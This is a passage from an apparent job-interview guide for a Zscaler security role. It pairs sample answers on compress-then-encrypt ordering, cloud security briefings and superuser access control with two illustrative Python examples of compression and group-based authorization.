This is especially true in the case of video compression because when you decompress, you will need to ensure that you get a stream fast enough so the viewing isn't interrupted by spooling or other latency issues. People often think that by decompressing video data, it will stream faster, but one of the issues is it requires a large amount of storage space, which could be a problem for many companies."
Tom's Answer #2
"I've heard people say compress then encrypt. The problem here is that if you encrypt first, then you'll have nothing but random data to work with, which will destroy any potential benefit you will get from the compression process. With data encryption, I focus on developing encryption algorithms (ciphers) that are hard to break by an attacker due to the computational complexities, which makes it even more difficult to be broken. Since both the sender and receiver share a secret key, it needs to be protected so that data communication is kept private between those two parties."
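The reason the order matters can be shown directly: ciphertext looks like random bytes, and random bytes do not compress. The following is an added example, not code from the original page or from Zscaler, and the cipher in it is a deliberately simple illustrative construction (HMAC-SHA256 used as a counter-mode keystream), chosen so the block runs with the Python standard library only; a production system would use a vetted authenticated cipher such as AES-GCM. The sample plaintext, key handling and sizes are all constructed for the demonstration.

```python
import hashlib
import hmac
import os
import zlib

# Constructed sample payload: repetitive records, the kind of data that compresses well.
PLAINTEXT = b"account=alice;balance=1200;status=active\n" * 40

NONCE_LEN = 16


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Illustrative keystream only: HMAC-SHA256(key, nonce || counter) blocks.
    It produces output indistinguishable from random, which is all this demo needs."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(key: bytes, data: bytes) -> bytes:
    """Stream-encrypt `data`; a fresh random nonce is prepended to the output."""
    nonce = os.urandom(NONCE_LEN)
    ks = keystream(key, nonce, len(data))
    return nonce + bytes(a ^ b for a, b in zip(data, ks))


def decrypt(key: bytes, blob: bytes) -> bytes:
    nonce, body = blob[:NONCE_LEN], blob[NONCE_LEN:]
    ks = keystream(key, nonce, len(body))
    return bytes(a ^ b for a, b in zip(body, ks))


def compress_then_encrypt(key: bytes, data: bytes) -> bytes:
    """The recommended order: shrink the redundant plaintext, then hide it."""
    return encrypt(key, zlib.compress(data, 9))


def decrypt_then_decompress(key: bytes, blob: bytes) -> bytes:
    return zlib.decompress(decrypt(key, blob))


def encrypt_then_compress(key: bytes, data: bytes) -> bytes:
    """The wrong order: the compressor is handed random-looking bytes."""
    return zlib.compress(encrypt(key, data), 9)


def compare(key: bytes = None, data: bytes = PLAINTEXT) -> dict:
    """Return the sizes produced by both orders plus a round-trip check."""
    key = key or os.urandom(32)
    a = compress_then_encrypt(key, data)
    b = encrypt_then_compress(key, data)
    return {
        "plain": len(data),
        "compress_then_encrypt": len(a),
        "encrypt_then_compress": len(b),
        "roundtrip_ok": decrypt_then_decompress(key, a) == data,
    }


if __name__ == "__main__":
    for name, size in compare().items():
        print(f"{name:>22}: {size}")
```

Compress-then-encrypt shrinks the 1640-byte sample to a few dozen bytes plus the nonce, while encrypt-then-compress comes out slightly larger than the plaintext because zlib can only store the incompressible ciphertext verbatim. One caveat a practitioner should add in the interview: when plaintext mixes secrets with content an outside party can influence, the size of the compressed output leaks information about the secret (the basis of the CRIME and BREACH attacks on compressed TLS and HTTP), so such systems either disable compression or keep the two kinds of data in separate compression contexts.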
14.
Many companies are new to the cloud computing environment. How do you brief them about what security aspects come with a cloud?
The interviewer is testing your knowledge of security measures associated with the cloud environment and your ability to help customers manage their company's cloud.

Knowing how to advise Zscaler's clients on the benefits of the cloud, specifically on security issues, will be a huge selling point for you landing the job.

Tom's Answer #1
"Cloud environments can be as secure as computing environments hosted on-premise based on two key attributes. These are Authentication and authorization, and Control of access. Authentication allows only those users who are authorized to access the resources hosted in the cloud. These include data, applications, and storage. Control of access is a system administrator tool which enables them to allow or deny access to specific users. Together, these tools provide a safe and secure cloud environment."
Tom's Answer #2
"There are two control mechanisms which keep hosted cloud compute environments safe and secure. These are authentication and authorization, and control of access. Authentication and authorization prevent unauthorized parties from accessing a company's data and applications. This is also known as 'hacking.' Control of access is the methodology system administrators use to provide authorization to known users. By only allowing authorized users to enter the system and then requiring them to authenticate themselves, companies can be assured their data and other computing resources are safe from theft and misuse."
15.
In a situation where a user needs admin rights on his system, what is the protocol that you follow to grant or restrict admin access?
I have seen on numerous occasions where someone needed an important document for a proposal, and the only place the data was available was on a server or drive that required administrative access. If you've ever needed to access folders or files that are locked or inaccessible, then you know what I mean. This is a common question from hiring managers who want to limit the number of users accessing sensitive data. They want to know if you follow security protocols and best practices for roles and privileges. In an interview, you might hear the term Greenplum. Greenplum is a database system that manages access to its databases using roles. Giving an example of some challenges you had with restricting access for a good reason, and then granting access after approval was given, shows the manager how well you followed protocol.

Tom's Answer #1
"Managing roles and privileges has its challenges because the user could be a database administrator seeking access to specific tables or objects. As part of our security best practices, I assign rules by role membership by group. I find this to be the best way of managing privileges, this way privileges can be revoked or granted from a group as a whole. I'm intimately familiar with a Greenplum database and how it works. For example, Greenplum requires a UNIX user ID to initialize and access the Greenplum database. This protocol is pretty standard in the industry, and widely used for creating new rules, and protecting passwords in the Greenplum database."
Tom's Answer #2
"If you look at various network infrastructures and architectures within companies, you will find a variety of user/role attributes. One of the user roles that I keep a close watch on is giving access to SUPERUSERS. I like to limit access to SU's for a number of reasons, one of the biggest is SU's bypass all access privilege checks in Greenplum dataset. In my humble opinion, I think only administrators should have that access, since we are intimately involved in the protection and security of the organization."
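Questions 14 and 15 both come down to the same two controls: authentication (who you are) and authorization (what you may do), with privileges managed by group membership and a superuser flag that bypasses every check. The following is an added example, not code from the original page, from Zscaler, or from Greenplum: it is a small in-memory model, constructed for this illustration, of exactly those behaviours. The users, groups, objects and passwords are made up, and the password storage uses PBKDF2 from the standard library as a stand-in for whatever the real directory or database does.

```python
import hashlib
import hmac
import os
from collections import defaultdict

ITERATIONS = 100_000  # PBKDF2 work factor for the demo
SALT_LEN = 16


class Directory:
    """Constructed model: password-based authentication plus group-based
    authorization, with superusers that bypass privilege checks (the behaviour
    the answers above describe for Greenplum's SUPERUSER role attribute)."""

    def __init__(self):
        self._creds = {}                   # user -> (salt, pbkdf2 digest)
        self._members = defaultdict(set)   # group -> set of users
        self._grants = defaultdict(set)    # group -> set of (action, object)
        self._superusers = set()

    # --- authentication -------------------------------------------------
    def add_user(self, user: str, password: str) -> None:
        salt = os.urandom(SALT_LEN)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
        self._creds[user] = (salt, digest)

    def authenticate(self, user: str, password: str) -> bool:
        if user not in self._creds:
            # Do the same work for unknown users so a missing account is not
            # distinguishable by response time.
            hashlib.pbkdf2_hmac("sha256", password.encode(), b"\x00" * SALT_LEN, ITERATIONS)
            return False
        salt, digest = self._creds[user]
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
        return hmac.compare_digest(candidate, digest)

    # --- authorization by group membership --------------------------------
    def add_member(self, group: str, user: str) -> None:
        self._members[group].add(user)

    def grant(self, group: str, action: str, obj: str) -> None:
        """Privileges are granted to groups, never to individual users."""
        self._grants[group].add((action, obj))

    def revoke(self, group: str, action: str, obj: str) -> None:
        """Revoking from the group removes the privilege from every member at once."""
        self._grants[group].discard((action, obj))

    def set_superuser(self, user: str, flag: bool = True) -> None:
        (self._superusers.add if flag else self._superusers.discard)(user)

    def authorize(self, user: str, action: str, obj: str) -> bool:
        if user not in self._creds:
            return False
        if user in self._superusers:
            return True  # superusers bypass all privilege checks
        return any((action, obj) in self._grants[g]
                   for g, users in self._members.items() if user in users)

    def superusers(self) -> list:
        """Audit helper: the list to keep as short as the second answer argues."""
        return sorted(self._superusers)


def demo() -> Directory:
    """Build the constructed scenario: two analysts in one group, one superuser."""
    d = Directory()
    d.add_user("alice", "correct horse battery staple")
    d.add_user("bob", "example-password-2")
    d.add_member("analysts", "alice")
    d.add_member("analysts", "bob")
    d.grant("analysts", "SELECT", "sales.orders")
    d.set_superuser("bob")
    return d


if __name__ == "__main__":
    d = demo()
    print("alice login ok:", d.authenticate("alice", "correct horse battery staple"))
    print("alice SELECT:", d.authorize("alice", "SELECT", "sales.orders"))
    print("alice DELETE:", d.authorize("alice", "DELETE", "sales.orders"))
    print("bob DELETE (superuser):", d.authorize("bob", "DELETE", "sales.orders"))
    print("superusers to review:", d.superusers())
```

The two points worth making in the interview follow from the model: revoking a privilege from the group changes the answer for every member in one step, and nothing in `authorize` constrains a superuser, which is why the superuser list is the one to audit and keep minimal. In a real Greenplum or PostgreSQL deployment the same audit is a query against the system catalog for roles with the superuser attribute set.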